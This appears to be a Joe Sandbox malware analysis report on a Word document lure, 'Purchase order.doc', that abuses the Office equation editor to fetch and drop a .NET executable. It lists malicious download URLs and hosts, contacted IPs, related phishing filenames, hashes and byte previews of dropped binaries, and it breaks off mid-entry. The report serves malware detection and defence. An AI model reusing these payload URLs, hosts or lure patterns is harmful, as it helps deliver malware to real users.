              http://www.filecrev.com/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpjtrue
              • Avira URL Cloud: safe
              		unknown
              http://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpjtrue
              • Avira URL Cloud: safe
              		unknown
              http://binatonezx.tk/villarzx.exetrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.windows.com/pctv.explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpfalse
                		high
                http://investor.msn.comexplorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpfalse
                    		high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.451281002.0000000004513000.00000004.00000001.sdmpfalse
                      		high
                      http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.506586274.00000000045CF000.00000004.00000001.sdmpfalse
                        		high
                        http://www.mozilla.com0explorer.exe, 00000006.00000000.452985686.0000000007159000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67raserver.exe, 00000007.00000002.680534004.0000000002B5F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://treyresearch.netexplorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.442147591.0000000003DF8000.00000004.00000001.sdmpfalse
                            		high
                            http://www.collada.org/2005/11/COLLADASchema9Donevillar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpfalse
                              		high
                              http://java.sun.comexplorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.villar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmpfalse
                                  		high
                                  http://investor.msn.com/explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAvillar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.432356441.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.467536657.0000000001D60000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              2.56.59.211
                                              		binatonezx.tkNetherlands
                                              		395800GBTCLOUDUStrue
                                              54.156.84.168
                                              		caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.comUnited States
                                              		14618AMAZON-AESUSfalse
                                              202.165.66.108
                                              		www.filecrev.comAustralia
                                              		18206VPIS-APVADSManagedBusinessInternetServiceProviderMYtrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:510256
                                              Start date:27.10.2021
                                              Start time:16:38:18
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 43s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Purchase order.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winDOC@9/10@4/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 12.8% (good quality ratio 12.4%)
                                              • Quality average: 76.1%
                                              • Quality standard deviation: 25.5%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:38:20API Interceptor42x Sleep call for process: EQNEDT32.EXE modified
                                              16:38:22API Interceptor77x Sleep call for process: villar8681.exe modified
                                              16:38:46API Interceptor108x Sleep call for process: raserver.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              2.56.59.211Swift-copy.docGet hashmaliciousBrowse
                                              • binatonezx.tk/obinnazx.exe
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • binatonezx.tk/stanzx.exe
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • binatonezx.tk/catzx.exe
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • binatonezx.tk/seasonzx.exe
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe
                                              payment.docGet hashmaliciousBrowse
                                              • binatonezx.tk/davidhillzx.exe
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • binatonezx.tk/trulexzx.exe
                                              FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                                              • binatonezx.tk/asadzx.exe
                                              QUOTE B1018530.docGet hashmaliciousBrowse
                                              • binatonezx.tk/mazx.exe
                                              About company.docGet hashmaliciousBrowse
                                              • binatonezx.tk/gregzx.exe
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • binatonezx.tk/catzx.exe
                                              PRICE QUOTATION.docGet hashmaliciousBrowse
                                              • binatonezx.tk/seasonzx.exe
                                              PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                                              • binatonezx.tk/obinnazx.exe
                                              Purchase Order.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              binatonezx.tkSwift-copy.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              payment.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              QUOTE B1018530.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              About company.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              PRICE QUOTATION.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase Order.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.comKZJgRYREQC.exeGet hashmaliciousBrowse
                                              • 54.157.107.32
                                              CV 10-06-2021.xlsxGet hashmaliciousBrowse
                                              • 54.157.107.32
                                              www.filecrev.comPurchase Order.docGet hashmaliciousBrowse
                                              • 202.165.66.108

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              GBTCLOUDUSsetup_installer.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              jGK42jrs2j.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              p3IJWYfJZw.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              setup_x86_x64_install.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              0OeX2BsbUo.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              Fri051e1e7444.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              payment.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              wA5D1yZuTf.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              setup_x86_x64_install.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              AMAZON-AESUStriage_dropped_file.dllGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              Payment Advice.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              AWB#708900271021,PDF.exeGet hashmaliciousBrowse
                                              • 34.237.7.9
                                              2jFfKOEefN.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              vx55dc0wIv.exeGet hashmaliciousBrowse
                                              • 34.233.132.165
                                              SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exeGet hashmaliciousBrowse
                                              • 52.20.84.62
                                              usuyeoiSVT.exeGet hashmaliciousBrowse
                                              • 44.199.40.234
                                              PLSW217DEJ59.vbsGet hashmaliciousBrowse
                                              • 34.199.8.144
                                              Order.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              RIVERSEDGE #PO, INVOICE Acknowledge & E- Check Remittance Advice - Copy.htmlGet hashmaliciousBrowse
                                              • 35.168.68.183
                                              payment advice_16000.exeGet hashmaliciousBrowse
                                              • 52.21.5.29
                                              hSNPFOpBGX.exeGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              Wq9FLAFuS8.exeGet hashmaliciousBrowse
                                              • 54.91.6.89
                                              Unpaid invoice.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              IMS211323.xlsxGet hashmaliciousBrowse
                                              • 54.192.66.129
                                              Swit_copy.exeGet hashmaliciousBrowse
                                              • 54.172.82.69
                                              Proof oF Payment.htmGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              Enquiry docs.exeGet hashmaliciousBrowse
                                              • 3.223.115.185
                                              DRAFT CONTRACT 0000499000-1100928777-pdf.exeGet hashmaliciousBrowse
                                              • 35.172.94.1
                                              RIVERSEDGE #PO, INVOICE Acknowledge & E- Check Remittance Advice - Copy.htmlGet hashmaliciousBrowse
                                              • 34.239.200.172

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):533504
                                              Entropy (8bit):7.535605271538659
                                              Encrypted:false
                                              SSDEEP:6144:qY6tTkkAiotWImLrfqldKQgpvXgfcJHSZU4qZYdNsagHan0BE8bPzNGq+mC3YS0b:YBImHHQ42ISNqFag6n0Bh7Nz+ma2
                                              MD5:E78C85674617F34A2F69FFC8DA6A3C48
                                              SHA1:9BFA82536DC11203B91441158DC5B8752126402E
                                              SHA-256:342BAC531D9B15D642629E91AF8944289AF752DD5D70C687E39CEFE9A14DC81D
                                              SHA-512:982E4325121967576F12EC8710E4397E0118B41524ED14F7581F44B5641BB7B574E2A64F01F3B132D595058E0D76F822AE7D197AF6290CEA9F19F86A9FEB27CE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 38%
                                              Reputation:low
                                              IE Cache URL:http://binatonezx.tk/villarzx.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0..............6... ...@....@.. ....................................@..................................5..O....@..(....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..B.................5......H...................t....|.............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):177152
                                              Entropy (8bit):7.970411716686075
                                              Encrypted:false
                                              SSDEEP:3072:cr+OFkZ8MtvknSS6grNZM3dVeqIoUxnVWWwRJZgaepJWma515A:cx27JkSS6KNZSXVnWSoaKam
                                              MD5:808C3076CEA76ACAF4CE2218088D1F91
                                              SHA1:FC4D7C9881D7252978C55CA0CB181CC894B7F247
                                              SHA-256:53D4A9BB3433619E3E72AB49B22CF6CF2C48A6B34FF2DFBA295D8D9E0C703436
                                              SHA-512:D756F0159282D142FC348541102BC60BC742E3845D269D6A2D57111CBFA0DFCC2C8EB193E36A9CC9F60FFB901FC47430660C1DB40CC88E1E72D17F4CB699F41C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3AC3AA43-F534-4DDB-AF6A-E52603844969}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE200956-F676-4F00-A1C2-2784A0C388FF}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):13312
                                              Entropy (8bit):3.5651044838041828
                                              Encrypted:false
                                              SSDEEP:384:qeOuKpy4UFilNuoxijZcwINCZDLRdHNYZ:qehK8jFilN9xUZcFkZDLRdHNYZ
                                              MD5:8D48293FF3DF3084EA6F2A671CBB7364
                                              SHA1:4DDFE751D6C3A665CD8BF35317E3EB893EF248A3
                                              SHA-256:8C6C35A0E9F2D6724677D1EBA39707B86CCB5FE5DDD31B6B0FC88EE5EE31D430
                                              SHA-512:177025E887A9E9E643D0A25FFB11A2FFF01D7361717810E83E14C9EC92624570695770AA39D02E674A3DCA74030F4DFD5B080C1317A19842CB6CE91F7C2AA70D
                                              Malicious:false
                                              Reputation:low
                                              Preview: %.....`...2.[.+.0.).^.8.[.6.4.'.5.!.8.~.|.1.(.0.?.|.[.6.4.1.-.?.<.?.).;.?.3.%.?.?.2.&.|.#.?.$.?.!.;.`.?.^.).~._.]./.5.).1.%.`.6.&.9.?...?.&.^...2.9.;.#.;.0.=.@.?.;.5.?...@.~...-.%./.:.?.^.&...[.@.~.%...=.`.%.~.7.|.`.%.?.5.'.<...;.+.%.-.7.8.*.7.?.%.[.*.6.!.[.].|.].(.~.+.-.6.<.%.2.].0._.9.?.].`.|.^.?.7.4.5...=.].1.[.9.(.-...-...].@.:.3.1.?.3...-.#.@.^.2.@._./.?.9.&...?.2.%.|...4.?.?.%.:.;.7.,.3...?.).%.-.#.6.+.!.?.5...1.!.9.<.+.|.?.*.].;.&.^.^.8.<.`.6.>.).8.'.`.$.%.9.!.7.(.`...#.].2.(.3.@.-.?.<.?.$.?.*...,.~.%.#.%.?.(.8.+.6.|.....`.?.<.1.*.?.1.;.:.@.$.?...9.7._.'.|._.....(./.&.+.).?.7.&.<.$.?.>.(.'.#.*.?.[..._.3.>.~.$.1.8.<.%.3.?.$.?.3.&.?.:.%.!.#.~.@.+.5.6.?.8.8.?.8.@.@.4.:.+.4.1.3.&.<...>.]...5.^.,.?.@.6.).;.=.(.>.?.+.~.%.%.....;.;...%.;.].#.|.^.;.]...'.'.~.>...?.2.!.:.%.:...(.5.1.9.?.'.[.8.+.(...3.].3.?.:.(.#...|.6.=.4...1.(.|.0.].&.?.+.?...?.@.^.2.'.*.2...=.:.2.7.'.8.7.?.2.#.<.4.3.%.<./.,...%.%.[.!.'.?.'.%.?._.;.]._.<.6.%.?.;.>.(.%.3.#.?.?.?.4.&.(.?.(.%.%.....6.%.?.4.[...,.@.?.$.$._.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7122D4A-0A99-4D1B-A260-A7FE10FBEC45}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3555252507007243
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbH:IiiiiiiiiifdLloZQc8++lsJe1MzQ
                                              MD5:BA8C943012DEE7467DE3D83DA2828CB3
                                              SHA1:9BF9A5BD82BF4512F5E106E584B62321C0BC0CA8
                                              SHA-256:13C424963F6EFD1B2101805A2A260B35C852F96C34015C747E47A11DD057E6A8
                                              SHA-512:4A6523236AEF44C2374E7C982898D9AB71EFCC3C87DD4CD22E43A31451088DFA05F9580815681C460B8BDAF3DFBF1902420125C23ED1D9B8E189C3321015508F
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase order.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Oct 27 22:38:18 2021, length=532611, window=hide
                                              Category:dropped
                                              Size (bytes):1034
                                              Entropy (8bit):4.538266037575395
                                              Encrypted:false
                                              SSDEEP:12:8SX0e0EtgXg/XAlCPCHaXeBhB/a/X+WOZU2+5jicvbrCNAsn0Is55DtZ3YilMMEK:8SX0O/XTuzIcckevq/A3Dv3qVE/7Eg
                                              MD5:731A1C224809E23D6D2AA8A7236E4EC2
                                              SHA1:10953EEBFB40781CADD8ED80928F63ED7A1DA962
                                              SHA-256:CDA5C7B062C04D2EBB818D60B955EEE04A50F3ECD3C8CF8105AC4A0683EE93DC
                                              SHA-512:6AAE94909EEB6A3A33C44097F4B9CFC1AD9656CAB96F07D910A1B82080843A540B5A7570DC314ECD7012CC4B14483C55A271C7C295531ABF1F485A3A43DB4471
                                              Malicious:false
                                              Preview: L..................F.... ......?......?...?B'...... ...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.. ..[S. .PURCHA~1.DOC..R.......S ..S .*.........................P.u.r.c.h.a.s.e. .o.r.d.e.r...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\Purchase order.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .o.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9..g............[D_
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):79
                                              Entropy (8bit):4.549839610519029
                                              Encrypted:false
                                              SSDEEP:3:bDuMJlt34KRAXdrFomX1aWN4KRAXdrFov:bCmoAAXd5yNAAXd5y
                                              MD5:BB79F1241DACCBC8C081EF907446DF67
                                              SHA1:A57670C3D8F3E52BDCD51C7993433291B1F6A50F
                                              SHA-256:ED8DF729758B4781973C7A4798964CE386E6E707EBFB2F7ECD67F3C6FC109785
                                              SHA-512:463D7A0B1C98AA5E46E6827CD4A62A48EDB7C4E9F76DB943730CB3B88440DCED863FBEA1EA6E3C878302E810A2A6C750D99F49977B4313216715BA01F0FB378C
                                              Malicious:false
                                              Preview: [folders]..Templates.LNK=0..Purchase order.LNK=0..[doc]..Purchase order.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              C:\Users\user\AppData\Roaming\villar8681.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):533504
                                              Entropy (8bit):7.535605271538659
                                              Encrypted:false
                                              SSDEEP:6144:qY6tTkkAiotWImLrfqldKQgpvXgfcJHSZU4qZYdNsagHan0BE8bPzNGq+mC3YS0b:YBImHHQ42ISNqFag6n0Bh7Nz+ma2
                                              MD5:E78C85674617F34A2F69FFC8DA6A3C48
                                              SHA1:9BFA82536DC11203B91441158DC5B8752126402E
                                              SHA-256:342BAC531D9B15D642629E91AF8944289AF752DD5D70C687E39CEFE9A14DC81D
                                              SHA-512:982E4325121967576F12EC8710E4397E0118B41524ED14F7581F44B5641BB7B574E2A64F01F3B132D595058E0D76F822AE7D197AF6290CEA9F19F86A9FEB27CE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 38%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0..............6... ...@....@.. ....................................@..................................5..O....@..(....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..B.................5......H...................t....|.............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\Desktop\~$rchase order.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
